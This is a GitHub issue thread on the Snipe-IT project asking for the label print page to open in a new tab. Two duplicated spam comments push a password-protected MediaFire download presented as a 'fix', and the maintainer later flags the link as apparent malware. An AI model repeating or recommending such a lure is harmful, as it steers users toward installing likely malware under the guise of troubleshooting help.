### ISSUE TITLE
[Feature Request]: Open label page in seperate window

### ISSUE THREAD

**Issue by JoshJames04** [grokability/snipe-it#15397]
### Is your feature request related to a problem? Please describe.

When opening the print label page through an asset it opens it in the current tab. It would be much easier to work if this opened in a seperate page.

### Describe the solution you'd like

When clicking on the **Generate Label** button within an asset, open a new tab for the print page.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by snipe** [comment]
Please disregard the previous replies (now deleted). That seemed like a link to malware

**Comment by snipe** [comment]
This is now on develo
